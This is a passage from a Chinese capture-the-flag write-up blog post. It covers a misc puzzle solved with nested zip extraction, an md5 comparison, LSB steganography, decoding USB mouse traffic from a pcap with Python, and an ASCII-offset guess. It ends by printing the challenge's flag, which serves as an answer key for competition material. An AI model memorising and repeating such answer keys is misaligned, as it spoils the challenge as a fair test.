class="string">&#x27;zi&#x27;</span>:</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">        passwd = bytes(name[<span class="number">0</span>:<span class="number">4</span>], <span class="string">&#x27;utf-8&#x27;</span>)</span><br><span class="line">    os.remove(old_name)</span><br></pre></td></tr></table></figure>

<p>然后解压之后有<code>150</code>个文件</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">for</span>($i=<span class="number">0</span>;$i&lt;<span class="number">520</span>;$i++)&#123;</span><br><span class="line">	<span class="keyword">if</span>(md5_file($i.<span class="string">&quot;/story&quot;</span>)!=<span class="string">&quot;5920be5416be8f3924a28da415c27a12&quot;</span>)&#123;</span><br><span class="line">		<span class="keyword">echo</span> $i.<span class="string">&quot;/story&quot;</span>;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>里面有150个<code>story</code>文件，跑一下文件的<code>md5</code>，发现第<code>150个文件</code>md5`是和其他文件不同</p>
<p>打开发现</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">这都被你发现了？</span><br><span class="line">我这故事不错吧，嘻嘻嘻</span><br><span class="line">那就把flag给你吧</span><br><span class="line">oh，不，还有一半藏在了pcap的心里，快去找找吧</span><br><span class="line">左心房右心房，扑通扑通的心，咿呀咿呀的❤</span><br><span class="line">72, 89, 75, 88, 128, 93, 58, 116, 76, 121, 120, 63, 108,</span><br></pre></td></tr></table></figure>

<p><code>0.zip</code>里面有个<code>flag.png</code>，<code>lsb</code>直接导出文件，猜下密码获取到一个<code>flag.pcag</code></p>
<p>然后<code>flag.pcag</code>是一个鼠标流量，用<code>tshark</code>导出下<code>data</code>部分</p>
<p>然后跑下坐标</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">nums = []</span><br><span class="line">keys = open(<span class="string">&#x27;out.txt&#x27;</span>,<span class="string">&#x27;r&#x27;</span>)</span><br><span class="line">f = open(<span class="string">&#x27;xy.txt&#x27;</span>,<span class="string">&#x27;w&#x27;</span>)</span><br><span class="line">posx = <span class="number">0</span></span><br><span class="line">posy = <span class="number">0</span></span><br><span class="line"><span class="keyword">for</span> line <span class="keyword">in</span> keys:</span><br><span class="line">    <span class="keyword">if</span> len(line) != <span class="number">12</span> :</span><br><span class="line">        <span class="keyword">continue</span></span><br><span class="line">    x = int(line[<span class="number">3</span>:<span class="number">5</span>],<span class="number">16</span>)</span><br><span class="line">    y = int(line[<span class="number">6</span>:<span class="number">8</span>],<span class="number">16</span>)</span><br><span class="line">    <span class="keyword">if</span> x &gt; <span class="number">127</span> :</span><br><span class="line">        x -= <span class="number">256</span></span><br><span class="line">    <span class="keyword">if</span> y &gt; <span class="number">127</span> :</span><br><span class="line">        y -= <span class="number">256</span></span><br><span class="line">    posx += x</span><br><span class="line">    posy += y</span><br><span class="line">    btn_flag = int(line[<span class="number">0</span>:<span class="number">2</span>],<span class="number">16</span>)  <span class="comment"># 1 for left , 2 for right , 0 for nothing</span></span><br><span class="line">    <span class="keyword">if</span> btn_flag == <span class="number">0</span> : <span class="comment"># 1 代表左键</span></span><br><span class="line">        f.write(str(posx))</span><br><span class="line">        f.write(<span class="string">&#x27; &#x27;</span>)</span><br><span class="line">        f.write(str(posy))</span><br><span class="line">        f.write(<span class="string">&#x27;\n&#x27;</span>)</span><br><span class="line">f.close()</span><br></pre></td></tr></table></figure>

<p>跑下坐标</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> PIL <span class="keyword">import</span> Image</span><br><span class="line">img = Image.new(<span class="string">&#x27;RGB&#x27;</span>,(<span class="number">1000</span>,<span class="number">1000</span>),(<span class="number">255</span>,<span class="number">255</span>,<span class="number">255</span>))</span><br><span class="line"><span class="comment">#创建Image对象</span></span><br><span class="line">f = open(<span class="string">&#x27;xy.txt&#x27;</span>)<span class="comment">#xy.txt文件</span></span><br><span class="line"><span class="keyword">for</span> line <span class="keyword">in</span> f.readlines():</span><br><span class="line">    point = line.split()</span><br><span class="line">    img.putpixel((int(point[<span class="number">0</span>]),int(point[<span class="number">1</span>])),(<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>))</span><br><span class="line"><span class="comment">#读取文件中的每一行，并修改像素</span></span><br><span class="line">f.close()</span><br><span class="line">img.show()</span><br></pre></td></tr></table></figure>

<p><img src="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20210912105411009.png" alt="image-20210912105411009"></p>
<p>把前面的<code>72, 89, 75, 88, 128, 93, 58, 116, 76, 121, 120, 63, 108,</code>加上图中的数字，猜个<code>ascii</code>的偏移，前面是数字减<code>1</code>为<code>G</code>，减<code>2</code>为<code>W</code>，从后面算起减<code>21</code>开始，<code>146</code>减<code>21</code>是<code>&#125;</code>，<code>119</code>减<code>20</code>是<code>c</code>，<code>134</code>减<code>20</code>是<code>s</code></p>
<p>根据提示要把<code>GWHT</code>换<code>Sangfor</code>，依次推算出<code>flag</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Sangfor&#123;W3lCom3_t0_M!sc&#125; </span><br></pre></td></tr></table></figure>


    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/09/27/%E5%A4%A9%E7%BF%BC%E6%9D%AF%20by%20kawhi/" rel="prev" title="天翼杯 2021">
      <i class="fa fa-chevron-left"></i> 天翼杯 2021
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/10/02/%E7%BB%BF%E5%9F%8E%E6%9D%AF%20by%20kawhi/" rel="next" title="绿城杯 2021">
      绿城杯 2021 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%AD%BE%E5%88%B0%E9%A2%98"><span class="nav-number">1.</span> <span class="nav-text">签到题</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#only-4"><span class="nav-number">2.</span> <span class="nav-text">only 4</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%A2%84%E6%9C%9F%E8%A7%A3"><span class="nav-number">2.1.</span> <span class="nav-text">预期解</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%9D%9E%E9%A2%84%E6%9C%9F"><span class="nav-number">2.2.</span> <span class="nav-text">非预期</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Cross-The-Side"><span class="nav-number">3.</span> <span class="nav-text">Cross The Side</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Baby%E2%80%93forenisc"><span class="nav-number">4.</span> <span class="nav-text">Baby–forenisc</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%B5%9B%E5%8D%9A%E5%BE%B7%E5%9B%BD%E4%BA%BA"><span class="nav-number">5.</span> <span class="nav-text">赛博德国人</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#misc520"><span class="nav-number">6.</span> <span class="nav-text">misc520</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="kawhi"
      src="http://yuhaojiang.gitee.io/picture/Blog头像.jpg">
  <p class="site-author-name" itemprop="name">kawhi</p>
  <div class="site-description" itemprop="description">随笔、分享、记录生活</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">18</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
  </nav>
</div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title"><i class="fa fa-link fa-fw"></i>
      links
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="http://47.98.234.232:8000/" title="http:&#x2F;&#x2F;47.98.234.232:8000&#x2F;" rel="noopener" target="_blank">G2mtu备用靶场</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="http://kawhi.gearhostpreview.com/" title="http:&#x2F;&#x2F;kawhi.gearhostpreview.com&#x2F;" rel="noopener" target="_blank">OneDrive网盘</a>
        </li>
    </ul>
  </div>

      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">kawhi</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
    <span title="站点总字数">144k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">2:11</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
